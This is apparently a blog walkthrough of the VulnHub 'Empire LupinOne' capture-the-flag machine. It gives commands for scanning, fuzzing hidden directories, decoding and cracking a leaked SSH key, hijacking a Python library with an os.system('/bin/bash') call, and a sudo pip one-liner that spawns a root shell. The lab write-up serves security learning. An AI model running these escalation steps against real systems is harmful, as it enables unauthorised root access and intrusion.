Open in app

Sign in

Write

Sign in

EMPIRE CTF: LUPINONE VulnHub Walkthrough | Writeup

SHAMS UL MEHMOOD
8 min readJun 5, 2024

--

Hello, friends I’m Shams Ul Mehmood and this is my 6th article. This article is a walkthrough of all about Empire LupinOne Box. It includes some type of security vulnerablities like Enumeration, Network Scanning, Python Library Hijacking, Privilege Escalation, Fuzzing the Hidden files, Decoding the SSH Key. You can download this Vulnhub box from here.

Pentesting Methodology

  1. Getting the target machine IP Address by using arp-scan
  2. Getting open port details by using the Nmap Tool
  3. Enumerating HTTP Service with Nikto / Gobuster Utilities
  4. Fuzzing the Hidden files with FFUF
  5. Decoding the SSH Key with Base58 Cypher
  6. Cracking the SSH Key Password with John the Ripper
  7. Logging in Into SSH and Reading the User Flag
  8. Enumerating target machine with User Access
  9. Escalating User Privileges to High Privileged User
  10. Getting the Root Flag by Exploit PIP Utility

Step-1:

📌️ In the first step of the scanning, I used the arp-scan commands to perform a Local Network Scan to find out the IP Address of the target machine.

Command : sudo arp-scan 192.168.163.0/24

Step-2:

📌️ In same step, after getting the victim machine’s IP address now I performed a Nmap scan to my victim. I used,

  • -sS : to scan running services.
  • -sV : to scan application version.
  • -p- : to scan all ports on victim machine.
  • -sC : to scan default script.
  • -Pn : to skip host discovery.
  • -O : to scan Operating System.

Command : sudo nmap -p- -Pn -O -sV -sC -sS 192.168.163.130

Step-3:

📌 In this step, I was trying to enumerate the HTTP webpage. When I open the victim ip address with port 80 and http protocol in browser.

Command : http://192.168.204.132:80

📌 I used the different tools like dirb, gobuster and nikto to enumerate interesting hidden files and directories on this target machine.

Command : nikto -h 192.168.163.130

📌 Then I used gobuster on victim ip address with default HTTP protocol and their port (80) and in this scan I found multiple directories and files like image, manual, robots.txt and javascript.

Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.163.130:80

📌 Next here you can see directory listing is on web server.

Command : http://192.168.163.130/image/

📌 Then in our case, I was found apache 2.4 server was runing on victim side by using given url.

Command : http://192.168.163.130/manual/en/index.html

📌 Then I was found robots.txt file and this file basically use for Search Engine Optimization.

📌 Further I was appended robots.txt file with target ip address in browser and then you can see hidden directory whose named /~myfiles.

Command : http://192.168.163.130/robots.txt

📌 Then in browser, I was appended hidden directory (/~myfiles) with victim ip address but in result I was obtained 404 error on browser.

Command : http://192.168.163.130/~myfiles/

Step-4:

📌 Further in this step, we use fuzzing to gain some additional information from this case. We made use of ffuf and we obtained a directory (secret).

Command : ffuf -u http://192.168.163.130/~FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -c

📌 Take a good look at that secret directory and analyses that here author is sharing some information related to SSH private key file related to user “icex64” that we need to fuzz.

Command : http://192.168.163.130/~secret/

📌 To find that secret private ssh key, we again use fuzzing with the help of ffuf once more and found text file (mysecret.txt).

Command : ffuf -u http://192.168.163.130/~secret/.FUZZ -e .py,.java,.php,.dart,.rar,.zip,.txt,.html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -c -ic -fc 403

Step-5:

📌 We explore mysecret.txt with a web browser. It appears to be a private ssh key, but it is encoded. We thoroughly examined this key and discovered that it is encoded in base 58.

📌 Then This file contained an encoded output. I used Cyberchef. to work it out, which I recommend for all manner of encoding/decoding/encryption, and just general use for CTFs. While the “Magic” recipe usually works, this time I went directly to decode from Base58. The output was icex64’s private SSH key.

📌 Let’s put this on a newly created file we will call victim_id_rsa by using nano command.

Command : nano victim_id_rsa

📌 Make sure we set the correct permissions with chmod 600 id_rsa.

Command : chmod 600 victim_id_rsa

Command : cat victim_id_rsa

Step-6:

📌 Then I was show the encrypted content of victim_id_rsa file.

Command : ssh2john victim_id_rsa

📌 Then I was saved the encrypted content of victim_id_rsa file into hash_password file.

Command : ssh2john victim_id_rsa > hash_password

Command : ls

📌 Then cracked the ssh key password by using john the ripper tool.

Command : john — wordlist=/usr/share/wordlists/fasttrack.txt hash_password

📌 We have all of the requirements for ssh login. Use our icex64 username, ssh-key, and cracked password (P@55w0rd!).

Step-7:

📌 We used the identified passphrase to log in through the SSH port as user ‘iecx64.’

📌 Then we used the SSH command, which asks for the passphrase. Since we already have the passphrase, we used P@55w0rd! as the password to log in to the target machine.

📌 We started exploring the target machine as user ‘iecx64’.

Command : ls

Command : ssh -i victim_id_rsa icex64@192.168.163.130

Command : whoami

📌 When we checked the contents of the current directory using the ‘ls’ command, we found the first flag of the challenge, which can be seen below.

Command : ls

Command : cat user.txt

Step-8:

📌 We start enumerating our target machine through SSH user access. We ran a few commands to gather information about victim machine.

📌 After that, we used the ‘sudo –l’ command to check the sudo permissions for the current user ‘iecx64’. We identified a python script owned by another user, ‘Arsene’, that the current user can run. So, let us check the contents of the python script,

Command : ls -la

Command : sudo -l

Command : cat /home/arsene/heist.py

Step-9:

📌 We’ve started the process of escalating privileges. To begin with the Python Library Hijacking technique, we must first determine the coordinates of webbrowser.py. That’s why we’re employing the linpeas script.

📌 Then on victim machine terminal, I was run given command.

Command : cd /tmp

📌 Then on attacker machine (kali linux machine) terminal, I was used below commands.

📌 Now we just navigate to that directory and launch a basic Python http server.

Command : cd ./Downloads

Command : ls

Command : python -m http.server 80

📌 After we moved the directory to /tmp directory and imported the Linpeas script from Kali Linux using the wget function I ran different commands on victim machine terminal.

Command : ls

Command : wget 192.168.163.128/linpeas.sh

Command : ls

Command : chmod +x linpeas.sh

Command : ./linpeas.sh

📌 We obtained the location of the Python file in a matter of seconds (webbrowser.py).

Command : ls -al

Command : nano /usr/lib/python3.9/webbrowser.py

📌 To operate this python file, we utilised the nano command and edit the script to call /bin/bash code into it.

Command : os.system(“/bin/bash”)

📌 After all of this effort, we ran the sudo command in conjunction with the coordinates specified in the permissions check on icex64. To switch the user icex64 to arsene.

Command : sudo -l

Command : sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

Command : whoami

📌 We got the user arsene and checked this user SUDO permissions and found user has privilege to execute pip binary as root without atuthentication. We have an idea to do pip privilege escalation after evaluating a few more moments.

Command : sudo -l

📌 We used the gtfobin instructions provided here to conduct pip privilege escalation. If the programme is allowed to run as superuser by sudo, it retains its elevated rights and can be used to access the file system, escalate, or keep privileged access.

📌 To conduct pip privilege escalation, we only need to run these three commands.

Command : TF=$(mktemp -d)

Command : echo “import os; os.execl(‘/bin/sh’, ‘sh’, ‘-c’, ‘sh <$(tty) >$(tty) 2>$(tty)’)” > $TF/setup.py

Command : sudo pip install $TF

Command : id

📌 Finally, we have the root; simply use the id command to check. It has been proven that it is root; simply change the directory to root. Congo!! We obtained the root flag.

Command : cd /root

Command : ls

Command : cat root.txt

CTF Game Over : I am Root!

\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀

📈⭐🧑‍🎤🎭💯

⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠋⠁⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠈⠙⣿⣿
⣿⣿⡄⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⢠⣿⣿
⣿⣿⣿⡀⠀⠀⢹⣿⣿⣿⣿⣿⠟⠉⠀⠀⠉⠻⣿⣿⣿⣿⣿⡏⠀⠀⢀⣿⣿⣿
⣿⣿⣿⣧⠀⠀⠀⢻⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡟⠀⠀⠀⣼⣿⣿⣿
⣿⣿⣿⣿⡄⠀⠀⠈⢿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⡿⠁⠀⠀⢠⣿⣿⣿⣿
⣿⣿⣿⣿⣷⠀⠀⠀⠈⢿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠁⠀⠀⠀⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠈⢻⡆⠀⠀⠀⠀⠀⠀⢰⡟⠁⠀⠀⠀⣼⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⢸⣿⣦⡀⠀⠀⢀⣴⣿⡇⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠈⣇⠸⣿⠒⠒⣿⠇⣸⠁⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⣿⡀⢿⡄⢠⡿⢀⣿⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠸⣧⠘⣷⣾⠃⣼⠇⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⢹⡶⠛⠛⢶⡏⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠘⣧⣀⣀⣼⠃⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣶⣿⣿⣶⣶⣶⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿

Bug Bounty
Hacking
Pentesting
Cybersecurity
Machine Learning

--

--

SHAMS UL MEHMOOD

Written by SHAMS UL MEHMOOD

6 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams